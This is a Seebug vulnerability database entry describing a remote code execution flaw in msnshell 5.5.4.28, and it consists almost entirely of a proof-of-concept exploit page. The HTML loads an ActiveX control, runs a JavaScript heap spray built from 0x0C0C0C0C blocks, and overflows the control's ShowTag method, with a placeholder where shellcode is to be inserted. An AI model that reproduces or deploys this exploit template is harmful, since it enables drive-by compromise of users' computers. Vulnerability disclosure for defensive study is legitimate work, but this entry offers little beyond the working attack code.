msnshell 5.5.4.28远程代码执行漏洞

2010-09-20T00:00:00
ID SSV:20127
Type seebug
Reporter Root
Modified 2010-09-20T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <html>
<object classid="clsid:BFB06F62-190C-42F6-91B1-3CB03560FE2D" id='target'></object>
<body>
<SCRIPT language="JavaScript">
var shellcode = unescape("you shellcode is here");
var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<350; x++) memory[x] = block +shellcode;

var buffer = '';

while (buffer.length < 540 ) buffer+='\x0C\x0C\x0C\x0C';

target.ShowTag(buffer);

</script>
</body>
</html>